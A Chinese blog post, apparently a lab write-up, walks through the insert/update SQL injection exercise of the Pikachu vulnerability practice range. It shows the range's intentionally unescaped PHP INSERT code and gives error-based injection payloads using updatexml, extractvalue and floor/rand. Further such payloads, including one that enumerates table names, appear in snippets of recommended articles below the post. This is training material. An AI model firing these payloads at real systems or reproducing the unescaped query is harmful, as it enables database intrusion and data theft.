Pikachu 漏洞练习平台 “insert/updata”注入

最新推荐文章于 2025-06-02 12:17:49 发布
原创 最新推荐文章于 2025-06-02 12:17:49 发布 · 364 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql #sql

本文详细介绍了Pikachu漏洞练习平台中的一个SQL注入漏洞,该漏洞源于代码未对用户输入进行转义,允许执行`insert`和`update`操作。通过提供精心构造的Payload,攻击者可以利用此漏洞获取数据库信息或修改数据。示例Payload包括了`UPDATEXML`函数的使用,展示了如何改变XML文档中节点的值。

Pikachu 漏洞练习平台 “insert/updata”注入

源代码

$html='';
if(isset($_POST['submit'])){
    if($_POST['username']!=null &&$_POST['password']!=null){
//      $getdata=escape($link, $_POST);//转义

        //没转义,导致注入漏洞,操作类型为insert
        $getdata=$_POST;
        $query="insert into member(username,pw,sex,phonenum,email,address) values('{$getdata['username']}',md5('{$getdata['password']}'),'{$getdata['sex']}','{$getdata['phonenum']}','{$getdata['email']}','{$getdata['add']}')";
        $result=execute($link, $query);
        if(mysqli_affected_rows($link)==1){
            $html.="<p>注册成功,请返回<a href='sqli_login.php'>登录</a></p>";
        }else {
            $html.="<p>注册失败,请检查下数据库是否还活着</p>";

        }
    }else{
        $html.="<p>必填项不能为空哦</p>";
    }
}

注入Payload

  1. kobe’ or updatexml(1,concat(0x7e,database()),0) or '
  2. *kobe’ and (select 2 from (select count(*),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a)#
  3. kobe’ extractvalue(0,concat(0x7e,version())) #

UPDATEXML (XML_document, XPath_string, new_value);
XML_document是String格式,为XML文档对象的名称;
XPath_string (Xpath格式的字符串) ;
new_value,String格式,替换查找到的符合条件的数据 ;
作用:改变文档中符合条件的节点的值。

FLOOR()函数可参考
SQL注入:floor()报错注入

时淼啊
关注
[Pikachu靶场实战系列] SQL注入insert/update注入
00勇士王子的博客
07-28 5164
insert注入 发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据 填写注册信息,然后抓个包,可以看到时post形式传输的数据 尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合 添加其他参数和)构建闭合 username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)# 构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,
pikachu靶场练习通关加知识点总结
qq_45584159的博客
12-11 8439
pikachu靶场练习 文章目录pikachu靶场练习前言一.暴力破解1.1 基于表单的暴力破解1.2验证码绕过(on sever)1.3验证码绕过(on client)1.4tokon防爆破二、xssxss概述DOM:文档对象类型xss形成的原因:xss漏洞的测试流程:1.1反射型xss(get)1.2反射型xss(post)三.CSRF四.SQL注入五.RCE六.文件包含七.不安全的文件下载八.越权九.目录遍历十.敏感信息泄露十一,PHP反序列化十二.XXE十三.重定向十四.SSRF十五.管理工具
pikachu insert update注入
2301_79595769的博客
12-23 1220
这种提交表单的题目涉及到insert和update语句为什么要使用报错注入呢?在构建好闭合后,网页仍没有回显,无法查询到数据。只能使用报错的方式使查询的数据显示在报错页面中。报错注入常用注入:update注入语法:更新某一列更新若干列payload:aaaa' or updatexml(1, concat(0x7e, database()),0) or '(字符型)' or extractvalue(1,concat(0x5e24,(database()))) or '(数字型)
Pikachu漏洞练习平台
blalaa的博客
09-04 3832
一、暴力破解 【基于表单的暴力破解】 ①在登录框随意输入账号密码,开启burp suite抓包。 ②将抓到的包,右键点击发送到intruder模块 ③打开intruder,点击positions,选择需要替换的变量,先“clear”后“add”,选择适合的攻击模式: 1)Sniper:狙击手,默认每次只能有一个变量进行攻击。 2)Battering ram:冲撞车。可选多个变量同时替换,但都只用同一个字典。 3)Ptichfork:草叉型,可选多个变量,每个变量一个字典,然后一一对应实验。 4)Clus
Pikachu的”insert/update”注入
weixin_50339082的博客
06-15 2712
Pikachu的”insert/update”注入 一、相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。 #所有三个参数都应为字符串。 E
Pikachu SQL注入insert/update注入
SS_liang的博客
01-11 2950
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
pikachu 漏洞平台sql注入insert/update注入
安全界的彭于晏的博客
06-26 1453
一般来说我们判断注入点的时候 如果是注册的地方应该是insert类型的,因为注册相当于往表里插一行新数据。 我们先来注册个账号 然后burp 抓个包分析一下 我们看到这里是有六个参数分别对应了 用户 密码 性别 手机 地址 住址 我们看到他提交的方式为post 我们还是首先来判断一下是否存在注入 和闭合的方式 先在第一个参数上加一个 ’ 试一下看看 爆出了数据库错误 我们可以判断是存在注入的 然后我们们看到参数中 第二个参数 ’ 可以闭合 注册页面是没有sql结果回显的,而且毕竟也不是
pikachu漏洞练习平台实战
yellowO的博客
12-29 1242
文件上传成功文件保存的路径为:{$upload['new_path']}
Pikachu漏洞练习平台SQL注入
ranuy阮的博客
02-27 2166
0x00 Pikachu Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 项目地址:https://github.com/zhuifengshaonianhanlu/pikachu 0x01 数字型注入(post) 界面如下 使用burpsuite抓包 POST /pikachu/vul/sqli/sqli_id.php HTTP/1.1 Host: 127.0...
Pikachu漏洞练习平台实验——SQL注入
m0_73826804的博客
02-22 3716
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图中下面的语句,这是条能被正常执行的SQL语句,导致表中的数据都会输出。
pikachu漏洞练习环境
10-25
pikachu漏洞练习环境,直接放在apache中的www目录下即可,如遇到不会安装可留言或者私信我。
pikachu漏洞平台靶场练习 总结 wp
Alexhirchi的博客
07-30 5035
每日学习 每日持续更新ing~ 之前一直都是在CTF刷题,感觉平常还是要打打靶场,学习一下实战环境啊~ 文章目录pikachu靶场Burt Force 暴力破解基于表单的暴力破解验证码绕过(on server)验证码绕过(on client)token防爆破?XSS(跨站脚本漏洞)CSRF(跨站请求伪造) pikachu靶场 Burt Force 暴力破解 关键点:连续性+自动化+字典 测试流程: (1)确认暴力破解的"可能性" (2)对字典的优化(根据注册要求去掉不必要的密码,验证存在的管理员账号直接.
Pikachu靶场-“insert/update“注入
最新发布
2401_83964264的博客
06-02 761
查表名:' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or'-当前数据库名Eira' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or'- 需数据库开启错误回显(生产环境可能关闭)。
关于命令执行与反序列化
Jeromeyoung
01-30 1898
命令与代码执行 实际就是对要求输入的值没有严格控制,导致恶意命令执行了。 简介:自己读吧,官方的东西。 1、远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命
Pikachu漏洞平台练习
SS_liang的博客
01-06 508
验证码正确正常传参,由于在验证完成后SESSION['vcode']并未销毁,我们于是就有了很明显的思路,确保验证码的正确值,对账户账号密码进行爆破。再进行暴力破解:(这里随便写了几个弱口令,主要为了演示)直接抓包可以看到(vcode=edo)存在逻辑判断。
pikachu漏洞练习平台~CSRF
weixin_67832625的博客
07-28 977
CSRF绕过,在pikachu靶场练习教程
pikachu~~~insert/update/delete,http头注入
weixin_50339832的博客
05-30 942
@[TOC] select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu' select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users' select username,password from users# UPDATEXML (XML_document, XPa.
pikachu在线靶场漏洞练习平台
weixin_41472455的博客
03-25 8547
希望大佬不要攻击网站,改平台只供测试学习用 测试地址: http://45.32.81.200
pikachu漏洞练习平台XSS
m0_55854679的博客
05-09 5488
XSS案例 get方式获取cookie图解 pkxss管理后台使用介绍 在绝对路径D:\phpstudy_pro\WWW\pikachu-master\pkxss下找到pkxss管理后台。 也可以点击,pikachu靶场的左侧漏洞栏最下面的管理工具下的xss后台,并进行初始化安装。 初始化安装后,输入页面提示的用户名和密码,即可成功进入pkxss管理后台。 get方式获取cookie方法 在目录D:\phpstudy_pro\WWW\pikachu-master\pkxss\xcookie下找
pikachu靶场insert/update注入
10-21
pikachu靶场是一个专门用于测试SQL注入漏洞靶场,其中包括了insert/update注入。在pikachu靶场中,insert/update注入漏洞通常出现在用户注册、登录、修改个人信息等功能中。攻击者可以通过构造恶意的SQL语句,将...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值